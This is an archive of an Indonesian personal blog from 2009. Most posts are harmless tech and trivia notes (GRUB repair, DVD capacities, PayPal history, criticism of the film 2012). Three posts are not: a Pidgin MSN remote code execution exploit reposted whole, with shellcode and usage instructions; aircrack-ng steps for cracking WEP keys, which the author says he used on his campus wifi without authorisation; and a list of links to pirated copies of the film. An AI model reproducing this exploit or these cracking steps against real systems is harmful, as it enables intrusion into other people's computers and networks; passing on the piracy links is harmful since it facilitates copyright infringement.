Minggu, 27 Desember 2009

Membuat program SPL menggunakan Metode Interpolasi Lagrange

Interpolasi Lagrange sangat dikenal dalam metode numerik, karena menggunakan fungsi dalam bentuk polinomial. Dari sekumpulan data berpasangan yang ada, dapat diketahui dengan pasti fungsi yang melalui titik-titik tersebut. Dengan menggunakan Matlab dibuat aplikasi untuk membantu proses pencarian fungsi yang dimaksud. Titik-titik yang diketahui haruslah merupakan bilangan real, dalam bidang datar. Berdasarkan fungsi ini dapat diprediksikan nilai selanjutnya untuk kasus yang ada. Interpolasi banyak digunakan untuk memprediksi nilai data berpasangan.

Berikut adalah contoh coding untuk membuat perhitungan Sistem Persamaan Linear menggunakan metode Lagrange dalam mata kuliah Metode Numerik, Program ini dibuat menggunakan Bahasa Pemrograman C.



Contoh Print Screen Hasil Program


Read More »

Kamis, 17 Desember 2009

Membuat Interaksi blogger lebih menarik

Hari ini dapet tambahan ilmu berkat temen gue, dia komplain ke gue mengenai blog gue ini. Katanya kalo chat ma gue saat gue ol itu ribet banget. mesti login ke YM. padahal ga selalu di pc yang dia pakai di instal YM dan dia mau pake webmessenger, males banget untuk login katanya.

setelah coba googling cara-cara optimasi blog, akhirnya gue menemukan sebuah widget dari Yahoo yang membantu gue memecahkan masalah ini. Nama widgetnya Pingbox. Dengan tambahan widget buatan Yahoo ini, kita bisa langsung berinteraksi dengan pengunjung blog melalui YM tanpa mengharuskan sang pengunjung tersebut login ke YMnya. Untuk lebih jelasnya, bisa langsung di kunjungi disini.

Untuk menampilkan Widget pingbox, maka minimal komputer yag digunakan mengakses blog atau web kita itu sudah terlebih dahulu di instal Flash player yang terbaru. Berikut akan gue coba ceritakan bagaimana kita menambahkan widget pingbox tersebut kedalam blog. (blog gue pake blogger)

1. Buka ke hompage pingbox; http://messenger.yahoo.com/pingbox. kemudian langsung pilih create a pingbox.


2. Kemudian kita akan dibawa menuju wizard setting pingbox. silahkan masukkan informasi yang hendak ditampilkan sesuai dengan keinginan. seperti contoh dibawah ini. Kemudian pilih save.


Setelah memilih save, kita akan dibawa ke sebuah form login Yahoo. isikan dengan ID Yahoo yang akan kita integrasikan dengan pinbox kita.



3. Pilih Jenis/Platform blog yang digunakan. (kebetulan gue menggunakan blogger, sehingga gue pilih blogger) dan kemudian copy script yang muncul pada kolom script. jangan lupa atur bentuk dan ukuran pingbox yang akan kita gunakan.


4. Tambahkan widget tersebut kedalam blog anda. Pilih layout > page element > add a gadget. Pilih Gadget Java Script dan kemudian paste script yang telah di copy tadi.

5. Blog anda kini semakin memudahkan pengunjung untuk berinteraksi.


Sumber : disini


Read More »

Rabu, 09 Desember 2009

Kapasitas DVD

Piringan DVD banyak sekali macamnya, tetapi pada dasarnya jika melihat kapasitasnya DVD diklasisfikasi menjadi 4 macam.

DVD-5, dapat menampung sekitar 4 700 000 000 bytes atau kira-kira 4.37 GB dengan perhitungan bahwa 1 kbyte adalah 1024 bytes*. Umumnya (yang ada dipasaran saat ini) DVD+R/W (DVD re-write plus format) dan DVD-R/W (DVD re-write minus format) menggunakan format DVD-5. DVD-5 juga disebut dengan Single Sided Single Layered (kalo diterjemahkan — satu muka satu lapisan–). DVD jenis ini paling banyak dipakai baik untuk menyimpan data ataupun film (movie DVD), karena itu biasanya disebut 4.7 GB media. Harganya paling murah diantara yang lain (tentu saja, krn kapasitasnya juga lebih kecil dan dari segi teknologi tidak terlalu sulit dalam pembuatannya), sekitar $25 setiap 100 lembarnya (saya tau krn pernah beli).

DVD-10, namanya juga DVD-10, tentu kapasitasnya adalah 2 x DVD-5, yaitu sekitar 9 400 000 000 bytes atau sekitar 8.75 GB. DVD+R/W dan DVD-R/W juga mendukung format ini. DVD-10 juga disebut Double Sided Single Layered (dua muka satu lapisan — artinya 2 permukaan DVD digunakan tetapi setiap mukanya hanya 1 lapisan saja).

DVD-9, kapasitas tampung data DVD tipe ini sekitar 8 540 000 000 bytes atau 7.95 GB. DVD+R mendukung format ini, dan setahu saya DVD format ini belum mendukung DVD+R/W, mungkin suatu saat akan ada teknologi yang bisa menggunakan DVD format ini untuk DVD R/W. DVD format ini juga disebut Single Sided Dual Layered (satu muka 2 lapisan –density data lebih tinggi/padat–). Nama lainnya yang lebih ngetren adalah DVD+R DL atau DVD+R9 atau 8.5 GB media –dua terakhir tidak begitu populer–. Harga DVD tipe ini masih sangat mahal, yang saya tahu (krn pernah beli) 5 lembar harganya 3500 yen (Rp. 320 000).

DVD-18, adalah DVD dengan kapasitas terbesar saat ini, yaitu sekitar 17 080 000 000 bytes atau 15.9 GB. DVD+R mensuport format ini. Biasanya juga disebut dengan Double Sided Dual Layered (2 muka 2 lapisan).

* Dalam dunia komputer 1 KB data = 1024 bytes, oleh karena itu 4 700 000 000 bytes / 1024 = 4 589 843KB / 1024 = 4482MB / 1024 = 4.37GB.

Kesimpulan:
Ukuran sebenarnya DVD+R/W/DL dan DVD-R/W
DVD-R/W = 4 706 074 624 bytes ( 4488 MB )
DVD+R/W = 4 700 372 992 bytes ( 4482 MB )
DVD+R DL = 8 547 993 600 bytes ( 8152 MB)

Sumber : http://gudangilmu.org/2007/12/07/kapasitas-dvd/
Read More »

Selasa, 08 Desember 2009

Sekilas mengenal Paypal

PayPal Inc. adalah perusahaan dalam jaringan yang menyediakan jasa transfer uang melalui surat elektronik, menggantikan metode lama yang masih menggunakan kertas, seperti cek dan wesel pos. PayPal juga menyediakan jasa untuk para pemilik situs e-commerce, lelangan, dan jenis usaha lain. Markas perusahaan ini terletak di San Jose, California, Amerika Serikat.

PayPal.com adalah alat pembayaran online yang terbanyak digunakan didunia saat ini. Setiap orang dapat mengirim atau menerima uang dengan pengguna PayPal lain, melakukan pembelian atau pembayaran di situs toko online/merchant, ebay, bisnis, pekerjaan dll.

Dengan menggunakan PayPal yang telah digunakan dalam jaringan pengguna global yang sangat luas, tidak terbatas hanya di Indonesia saja :
Untuk Pembeli : Dapatkan lebih banyak pilihan penjual dan kemudahan pembayaran melalui PayPal
Untuk Penjual : Tingkatkan penjualan dan permudah calon pembeli anda dengan menerima pembayaran melalui PayPal

PayPal mengeliminasi cara bertransaksi konvensional seperti bank lokal saja atau alat pembayaran lain yang terbatas, dan aktifitas transaksi menjadi lebih mudah dan aman


Awal pendirian

PayPal Corp. sebenarnya adalah sebuah perusahaan hasil penggabungan antara Confinity dengan X.com yang dilakukan pada tahun 2000. Confinity didirikan pada bulan Desember 1998 oleh Peter Thiel dan Max Levchin dengan tujuan awal sebagai perusahaan perantara pembayaran Palm Pilot dan penyedia layanan kriptografi. Adapun X.com didirikan oleh Elon Musk pada bulan Maret 1999 sebagai penyedia jasa perencanaan keuangan. Kantor pusat kedua perusahaan ini mulanya terletak di 165 University Avenue, Palo Alto, California, Amerika Serikat.

Akuisisi oleh ebay

Melihat masa depan PayPal yang menjanjikan, eBay menyimpulkan PayPal cocok digunakan sebagai perantara pembayaran lelang online mereka. Sebelumnya, ebay telah membeli Billpoint pada bulan Mei 1999 dan menjadikannya sebagai perantara pembayaran satu-satunya yang diakui oleh eBay walaupun pilihan untuk menggunakan metode pembayaran lain masih diizinkan. Pada bulan Februari 2000, rata-rata ada sekitar 200.000 penawaran barang per hari yang menggunakan PayPal, sedangkan yang menggunakan Billpoint hanya mencapai 4.000 penawaran saja. Bahkan pada bulan April 2000, sudah ada lebih dari satu juta penawaran yang menggunakan PayPal.

Akhirnya pada tahun 2002, eBay mengakuisisi PayPal seharga USD 1,5 miliar. ebay belakangan menghapus layanan pembayaran melalui Billpoint untuk meningkatkan potensi PayPal. Banyak pesaing utama PayPal yang akhirnya bangkrut atau dijual, seperti Citibank C2IT yang ditutup pada akhir 2003, Yahoo! PayDirect yang tutup pada akhir 2004, dan layanan BidPay milik Western Union yang ditutup pada tahun 2005. Pesaing PayPal lain yang masih bertahan hingga sekarang antara lain adalah AlertPay, Liberty Reserve, Kagi, dan Moneybookers.

Pada kuartal pertama 2006, total transaksi yang dilakukan melalui PayPal mencapai USD 8 miliar, meningkat 41% dari tahun ke tahun.

Sumber : disini
Read More »

Minggu, 22 November 2009

2012 dan 11 Kritik Ilmiah

Film 2012 sendiri menjadi menarik buat saya terutama setelah saya mendengar fatwa haram dari MUI (Amidhan) karena film ini menceritakan kiamat, and bla bla (metro TV senin 16 Nov malam). Sehingga besok sorenya langsung saya tonton. Kesan saya setelah menonton, film ini walau mengangkat issue ilmiah, namun justru banyak hal yang terasa kurang ilmiah.

Berikut ini beberapa kupasan ilmiah yang menjelaskan kekurang ilmiahan film tersebut:

- Pertama; kehancuran dunia itu dipicu oleh ketidakstabilan inti akibat gaya tarik matahari dan inti galaksi, yang seakan memiliki periode ulang tiap 70 jt tahun (jurasic). Setahu saya, 70 jt tahun yll, memang terjadi laut naik maksimum (maximum sea level rise) namun tidak disertai dengan pergeseran lempeng secara cepat sebagaimana ditampilkan dalam film 2012.


- Kedua: Terbentuknya patahan besar di amerika bagian barat ( 600 an km relatif utara selatan) dalam waktu 2 jam, berarti rekahan itu membuka dengan kecepatan rata2 300 km/ jam. Namun dalam adegan mobil (yang disupiri oleh aktor utama) berlari berkejaran dengan rekahan nampaknya si mobil berhasil melewati/ menyamai kecepatan rekahan. Agak mengherankan di tengah2 lalulintas yang padat, sebuah mobil dapat melaju lebih dari 300 km/ jam.


- Ketiga: Dalam adegan pesawat yang berkejaran dengan abu gunung api (pyroclastic ash) tampak pesawat sempat masuk ke dalam badai abu namun akhirnya keluar dengan selamat. Apabila kita ingat kejadian pesawat garuda yang mesinnya mati akibat kemasukan abu vulkanik gunung galunggung di tahun 1983 an (padahal tidak disaat meletus), dan berbagai pesawat jatuh akibat kemasukan abu vulkanik lainnya, nampaknya adegan ketika sang aktor utama dengan pesawat berbaling-baling (propeler) dapat keluar dari abu sangatlah mengherankan.


- Keempat: perlu pula diketahui, semburan pyroclastic ash dari gunung yang baru meletus itu suhunya sekitar 600 derajat celcius, harusnya orang2 yg didalam pesawat akan termasak hidup2 ketika pesawatnya masuk ke dalam abu tersebut.


- Kelima: Ketika pesawat Antonov yang dinaiki sang aktor melewati Hawai yang sudah porak poranda karena gunungnya meletus, pesawat tersebut dapat terbang dengan normal-normal saja.


- Keenam; ketiga kutub utara bumi berubah menjadi kutub barat dan timur, lalu bagaimana bumi bisa berotasi? Sedangkan kehidupan pada waktu itu masih lancar2 saja kecuali pada daerah yang sudah mengalami tsunami dan gempa.


- Ketujuh: inti bumi itu sebenarnya padat, namun dalam film tersebut ditampilkan bahwa dibawah permukaan seperti ruang kosong dimana bangunan, gedung2 bertingkat dapat masuk/ terjun ke bawah.


-Kedelapan: tidak semua bagian bawah bumi itu ada magma, karena magma hanya berada pada jalur subduksi (volcanic arc) saja. Namun tampaknya di dalam film di setiap rekahan yang terbentuk nampak ada magma yang mengalir (sangat tidak logis).


-Kesembilan : Ketika pesawat antonov yang dinaiki sang aktor kehabisan bahan bakar padahal tujuannya China, seharusnya mereka mendarat di laut namun ternyata mereka mendarat di daratan China. Dalam film itu dikisahkan bahwa dataran China bergeser menuju Hawai (lebih dari 8000 km) dalam waktu kurang dari 10 jam. Artinya dataran itu bergerak dengan kecepatan lebih dari 800 km/ jam (mirip pesawat terbang). Sedangkan pegunungan himalaya dan suku Tibet di atasnya digambarkan baik2 saja. Bahkan helicopter (yang kecepatannya hanya 300 km/ jam) pun dapat berlalu-lalang dengan enaknya di pegunungan himalaya. Apabila datarannya bergerak dengan kecepatan 800 km/jam, bagaimana helicopter di atasnya bisa bergerak dengan mudah take off dan landing dengan santainya??


> -Kesepuluh : dalam zaman akhir Kapur, seluruh es pernah mencair, kandungan uap air menurun, sehingga muka air laut naik (tertinggi). Ternyata jumlah volume air bila seluruh air dijatuhkan ke laut hanyalah akan mengangkat muka laut hingga 200 an meter dari sekarang. Nah dalam film itu, air laut naik hingga mencapai 29.000 feet…… atau hampir 10 km…10.000 m??? Bagimana bisa?? dari mana air itu berasal???


> -Kesebelas: dalam film itu digambarkan bahwa Pegunungan Himalaya adalah daerah yang hancur belakangan, karena merupakan daerah tinggian (terakhir tenggelam). Padahal sesungguhnya daerah Himalaya adalah daerah collision (tumbukan) dari 2 lempeng yang bersifat tektonik aktif. Lalu bagaimana Himalaya justru hancur belakangan??(Didit Ndut)
Read More »

How to open docx in office 2003

Habis instal windows, jangan lupa instal microsoft office. bagi gue, 2 hal tersebut tidak dapat dipisahkan. gue masih belum bisa berpaling menggunakan program pengolah data lain. Namun bukan berarti gue ga mau berpaling menggunakan yang lain. Gue cuma masih berusaha mengurangi jumlah program bajakan dalam PC tua gue ini. :-)

Langsung aja di install Microsoft Office 2003 yang emang sudah selalu disiapkan di sebelah PC gue. langsung install complete, karena terkadang gue suka males kalo nanti ada paket2 yang butuh di instal.

Selesai instal, mulailah mencoba-coba aplikasinya. selalu gue mulai dengan microsoft word 2003. program pengolah kata yang telah gue kenal sejak gue berkenalan dengan windows. coba buka beberapa dokumen, tampaknya tidak ada masalah. semua file dokumen gue bisa dibuka dengan baik.

Masalah baru timbul saat ade gue nitip Flashdisknya untuk di scan virus. terlihat di Flashdisknya sebuah extention aneh dengan logo word. file tersebut berextenstionnya .docx

Mulailah mencari informasi, file apakah gerangan. kunjungi situs microsoft, menerangkan bahwa extention tersebut adalah Docx merupakan standard file MS Office 2007 milik Microsoft. Lebih spesific standard itu bernama OOXML alias Open Office. XML. Waduh, apalagi itu. makin ga ngerti gue. hehe,,,,

Standard .docx ini banyak bikin repot mereka yang tidak tahu. Tidak sedikit yang panik, karena menyangka itu virus. Solusinya bagaimana? apakah harus instal ulang Microsoft officenya ke versi 2007? ternyata tidak. solisinya mudah, setelah di cari menggunakan jasa paman Google (sungguh, gue ga bisa bayangin Internet tanpa kehadiran Google). Gue mendapat banyak software yang menawarkan jasa converter dari docx ke doc, sehingga MS Word kita yang sekarang bisa membuka file .docx tersebut.
Diantaranya http://zamzar.com/. Kunjungi webnya.web sitenya straigth to the point, dan mudah
penggunaannya.Intinya mereka akan mengconvert secara online file .docx milik Anda ke
format standard .doc dan mengirimkan via email.

Tapi bagaimana kalo kita jarang-jarang terkoneksi internet dan sedang butuh untuk membuka file tersebut. selidik punya selidik, ternyata Microsoftpun merelease patch agar product-product lawasnya dapat membuka file extention dalam microsoft 2007. Berikut kutipan langsung dari site resminya di sini.

To open Microsoft Office Word 2007 .docx or .docm files with Microsoft Office Word 2003, Word 2002, or Word 2000, you need to install the Microsoft Office Compatibility Pack for 2007 Office Word, Excel and PowerPoint File Formats and any necessary Office updates. By using the Compatibility Pack for the 2007 Office system, you can open, edit some items, and save Office Word 2007 documents in previous versions of Word. You can download the Compatibility Pack for the 2007 Office system from Microsoft Office Online.

With the Compatibility Pack, you can use some previous versions of Word to open Office Word 2007 documents that were saved in .docx and .docm formats. You cannot open Office Word 2007 template files that were saved in .dotx or .dotm format.


langsung aja pada intinya. Microsoft menyediakan fileconverter untuk edisi office lawas, agar dapat membaca extention keluaran dari office 2007. untuk dapat mencoba fileconverter tersebut, silahkan download patchnya di sini.

Langkah berikutnya sama seperti install file biasa. dan sekarang, Microsoft office gue adalah microsoft office 2003 rasa 2007. :-)

Thanks to :

- Google
- Microsoft Official site




Read More »

Sabtu, 21 November 2009

Reinstal Grub yang hilang setelah install windows

Akhirnya, malam ini bisa sedikit tenang. setelah semua kesibukan seharian. dari pergi kondangan sampe kuliah dan nungguin dosen yang ngaret ga tau mpe jam berapa. dah gitu, hari ini koprs berseragam coklat sedang mencari tambahan rejeki, ada razia kendaraan sampe 3 kali sepanjang perjalanan dari bekasi ke rawamangun. Untung surat-surat dan lain-lainnya lengkap. jadi tidak ada kendala berarti dalam perjalanan pulang... Ups, tapi bukan itu maksud tulisan malam ini. :-) as you know, gue berusaha buat blog gue berisikan seputar tulisan-tulisan praktikum gue.

Rencana malam ini adalah instal ulang windows dan optimasi. karena sepertinya windows yang terpasang sekarang sudah sangat terasa amat lambat. hingga untuk buka beberapa program bersamaan gue bisa selingi dengan bikin kopi. :-( memang, sudah lumayan lama windows ini tidak terurus. setelah beberapa bulan ini lagi sibuk beradaptasi dengan sistem Open source.

Oke, instal ulang selesai. Namun ada sedikit masalah. ternyata saat booting ulang, partisi Ubuntu tidak terbaca. sempet bingung, apakah harus instal ulang atau ada hal yang bisa dilakukan. akhirnya dengan sedikit bantuan dari paman Google, didapat jawabannya. ternyata, Grub Ubuntu tertiban ama microsoft.

Berikut cara untuk mengembalikan konfigurasi Grub yang tertiban oleh Microsoft.

1. sediakan live cd ubuntu
2. masuk dulu ke bios trus setting first boot device nya cd room
3. booting lah memakai live cd ubuntu
4. pilih option start using live cd ubuntu without installing
5. begitu dah masuk bukalah terminal = application -> accesories -> terminal
6. ketik sudo grub
7. ketik find /boot/grub/stage1; akan keluar hasilnya dari (sd?,?) misalkan (sd0,7)
8. ketik root (sd?,?); isikan dari hasil nomor 7 diatas
9. ketik setup (sd0)
10. quit
11. restart ubuntu,
12. ubah kembali bootnya menjadi hardisk. dan kini PC gue kembali dual boot kembali.


Rencana berikutnya, optimasi windows gue agar bisa makin ngacir. dengan sedikit trik dari sini.

thanks to :
- google.com
- p19n0s3

Read More »

Kamis, 19 November 2009

How to decrypt WEP and WAP key

Lagi iseng-iseng pengen belajar bagaimana cara membuka password wifi di kampus. ketemu video tutorial ini. Dah di coba dikampus, mangstap. cuma butuh waktu 10 menit untuk bongkar password wifi...

Sok atuh monggo di cek...

tools :
- Aircrack-ng
- Ubuntu Linux
- Wireless card merk Ralink atau Atheros yang bisa digunakan sebagai injector packet
- Access Point yang mau dipake buat percobaan. :-)


A. WEP Key

video

Berikut Step-stepnya :

1. ubah mode interface wireless kita menjadi mode monitor (disini menggunakan rausb0)
root@Tom-PC:~#airmon-ng start rausb0


2. cek status mode interface tersebut
root@Tom-PC:~#iwconfig

3. Cek Access Point yang tersedia hingga di dapat target.
root@Tom-PC:~#airodump-ng rausb0


4. Setelah target ditemukan, mulai capture IVS.
root@Tom-PC:~#airodump-ng --ivs -c --write namafile rausb0


5. sekarang kita mulai lakukan Aireplay Attacks. Langkah pertama yang harus dilakukan adalah
root@Tom-PC:~#aireplay-ng -3 -b rausb0
root@Tom-PC:~#aireplay-ng -1 0 -a rausb0
root@Tom-PC:~#aireplay-ng -0 0 -a rausb0




note : command lebih lanjut tentang aireplay bisa di lihat menggunakan aireplay-ng --help

6. setelah data cukup, gunakan aircrack untuk mendecrypt ivs.
root@Tom-PC:~#aircrack-ng namafile*.ivs



B. WPA Key

video

Read More »

Selasa, 17 November 2009

Pidgin MSN <= 2.5.8 Remote Code Execution

/*
* Pidgin MSN <= 2.5.8 Remote Code Execution
*
* Pierre Nogues - pierz@hotmail.it
* http://www.indahax.com/
*
*
* Description:
* Pidgin is a multi-protocol Instant Messenger.
*
* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].
* The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets
* which could lead to memory corruption.
*
* Affected versions :
* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.
*
* Plateforms :
* Windows, Linux, Mac
*
* Fix :
* Fixed in Pidgin 2.5.9
* Update to the latest version : http://www.pidgin.im/download/
*
* References :
* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write
* [3] http://www.pidgin.im/news/security/?id=34
*


* Usage :
* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/
* javac.exe -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit.java
* java -cp "%classpath%;.\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL
*
*/

import net.sf.jml.*;
import net.sf.jml.event.*;
import net.sf.jml.impl.*;
import net.sf.jml.message.p2p.*;
import net.sf.jml.util.*;

public class PidginExploit {

private MsnMessenger messenger;
private String login;
private String password;
private String target;

private int session_id = NumberUtils.getIntRandom();

private byte shellcode[] = new byte[] {

/*
* if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !
* sub esp,500
*/
(byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,


/*
* windows/exec - 121 bytes
* http://www.metasploit.com
* EXITFUNC=process, CMD=calc.exe
*/
(byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,
(byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,
(byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,
(byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,
(byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,
(byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,
(byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,
(byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,
(byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,
(byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,
(byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,
(byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,
(byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,
(byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,
(byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,
(byte) 0x00
};

// reteip = pointer to the return address in the stack
// The shellcode will be wrote just before reteip
// and reteip will automaticly point to the shellcode. It's magic !
private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8

private int neweip;
private byte[] payload = new byte[shellcode.length + 4];
private int totallength = reteip + 4;

public static void main(String[] args) throws Exception {

if(args.length != 3){
System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");
}else{
PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);
exploit.start();
}

}

public PidginExploit(String login, String password, String target){
this.login = login;
this.password = password;
this.target = target;

neweip = reteip - shellcode.length ;

for(int i=0;i payload[i] = shellcode[i];

payload[shellcode.length] = (byte)(neweip & 0x000000FF);
payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);
payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);
payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);
}

public void start() {
messenger = MsnMessengerFactory.createMsnMessenger(login,password);
messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);

messenger.setLogIncoming(false);
messenger.setLogOutgoing(false);

initMessenger(messenger);
messenger.login();
}

protected void initMessenger(MsnMessenger messenger) {

messenger.addContactListListener(new MsnContactListAdapter() {

public void contactListInitCompleted(MsnMessenger messenger) {

final Object id = new Object();

messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {

public void switchboardStarted(MsnSwitchboard switchboard) {

if (id != switchboard.getAttachment())
return;

switchboard.inviteContact(Email.parseStr(target));
}

public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
if (id != switchboard.getAttachment())
return;

MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
msg.setIdentifier(NumberUtils.getIntRandom());
msg.setSessionId(session_id);
msg.setOffset(0);
msg.setTotalLength(totallength);
msg.setCurrentLength(totallength);

// This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null
// We'll use this buffer to rewrite memory in the stack
msg.setFlag(0x1000020);

msg.setP2PDest(target);

switchboard.sendMessage(msg);

System.out.println("First packet sent, waiting for the ACK");

}

public void switchboardClosed(MsnSwitchboard switchboard) {
System.out.println("switchboardClosed");
switchboard.getMessenger().removeSwitchboardListener(this);
}

public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){
System.out.println("contactLeaveSwitchboard");
}
});
messenger.newSwitchboard(id);
}
});

messenger.addMessageListener(new MsnMessageAdapter(){

public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {

//We receive the ACK of our first packet with the ID of the new bogus packet
message.getIdentifier();

MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,
payload.length, payload, target);

switchboard.sendMessage(msg);
System.out.println("ACK received && Payload sent !");
System.out.println("Exploit OK ! CTRL+C to quit");

}
});



messenger.addMessengerListener(new MsnMessengerAdapter() {

public void loginCompleted(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " login");
}

public void logout(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " logout");
}

public void exceptionCaught(MsnMessenger messenger,
Throwable throwable) {
System.out.println("caught exception: " + throwable);
}
});

}
}

// milw0rm.com [2009-09-09]

Sumber : di sini
Read More »

Senin, 16 November 2009

Download 2012 Full Movie CAM Quality


huft nemu juga akhirnya,..?

yang pengin nonton tapi males antri tiket + gag punya uang,kenapa gag donlot sendiri aja,..

kan bisa berduaan ma pacar dikamar,..wkwkkwkww,..

tapi masih dalam bahasa linggis nie,..?

silakan aja di donlot,..



Hotfile


http://hotfile.com/dl/16871763/f51f2e0/2012_ENG.part1.rar.html

http://hotfile.com/dl/16871764/9d117b3/2012_ENG.part2.rar.html

http://hotfile.com/dl/16871765/b854f63/2012_ENG.part3.rar.html

http://hotfile.com/dl/16871766/4fae46b/2012_ENG.part4.rar.html

http://hotfile.com/dl/16871821/c30edbc/2012_ENG.part5.rar.html

http://hotfile.com/dl/16871823/fd6f1e9/2012_ENG.part6.rar.html

http://hotfile.com/dl/16871826/be57750/2012_ENG.part7.rar.html

Uploading

http://uploading.com/files/d4d3fd4a/2012_ENG.part1.rar

http://uploading.com/files/2455c648/2012_ENG.part2.rar

http://uploading.com/files/mm1e5571/2012_ENG.part3.rar

http://uploading.com/files/e99m4fbm/2012_ENG.part4.rar

http://uploading.com/files/279af8a7/2012_ENG.part5.rar

http://uploading.com/files/bd751264/2012_ENG.part6.rar

http://uploading.com/files/ecffd39f/2012_ENG.part7.rar



update link

http://rapidshare.com/files/304768057/2012_warezlobby.org.part1.rar

http://rapidshare.com/files/304768221/2012_warezlobby.org.part2.rar

http://rapidshare.com/files/304768319/2012_warezlobby.org.part3.rar

http://rapidshare.com/files/304768488/2012_warezlobby.org.part4.rar

http://rapidshare.com/files/3047684...31/2012_warezlobby.org.part5.rar

http://rapidshare.com/files/304767813/2012_warezlobby.org.part6.rar

http://rapidshare.com/files/304767157/2012_warezlobby.org.part7.rar

http://rapidshare.com/files/304767977/2012_warezlobby.org.part8.rar



Update link lagi

http://hotfile.com/dl/17496342/177ff7b/sobisvn_2012CAM.part1.rar.html
http://hotfile.com/dl/17496348/05b7c1d/sobisvn_2012CAM.part2.rar.html
http://hotfile.com/dl/17496346/283ab80/sobisvn_2012CAM.part3.rar.html
http://hotfile.com/dl/17496343/7ba55ca/sobisvn_2012CAM.part4.rar.html
http://hotfile.com/dl/17496344/d4...08c0a/sobisvn_2012CAM.part5.rar.html
http://hotfile.com/dl/17496347/b38a47b/sobisvn_2012CAM.part6.rar.html
http://hotfile.com/dl/17496345/8541c7f/sobisvn_2012CAM.part7.rar.html




nambah lagi




http://rapidshare.com/files/306794911/2012.2009.D.CAMRip.ELEKTRI4KA.part01.rar
http://rapidshare.com/files/306795225/2012.2009.D.CAMRip.ELEKTRI4KA.part02.rar
http://rapidshare.com/files/306795555/2012.2009.D.CAMRip.ELEKTRI4KA.part03.rar
http://rapidshare.com/files/306794789/2012.2009.D.CAMRip.ELEKTRI4KA.part04.rar
http://rapidshare.com/files/306795269/2012.2009.D.CAMRip.ELEKTRI4KA.part05.rar
http://rapidshare.com/files/306794670/2012.2009.D.CAMRip.ELEKTRI4KA.part06.rar
http://rapidshare.com/files/306796556/2012.2009.D.CAMRip.ELEKTRI4KA.part07.rar
http://rapidshare.com/files/306796754/2012.2009.D.CAMRip.ELEKTRI4KA.part08.rar
http://rapidshare.com/files/306795130/2012.2009.D.CAMRip.ELEKTRI4KA.part09.rar
http://rapidshare.com/files/306794308/2012.2009.D.CAMRip.ELEKTRI4KA.part10.rar

tambahan dari IDWS

http://download.en.hellshare.com/2012-ta8626-www-movieinfo-blog-com.avi/702902
or
http://www.storage.to/get/yyPk2v3Z/2012.TA8626_www.movieinfo.blog.com_.avi
or
http://www.BigAndFree.com/492058
or
http://filebase.to/files/1019429/2012.TA8626_www.movieinfo.blog.com_.avi
or
http://www.megaupload.com/?d=JI8N1DS3
or
http://www.megavideo.com/?d=JI8N1DS3
or
http://rapidshare.com/files/306844566/2012.TA8626_www.movieinfo.blog.com_.avi.html
or
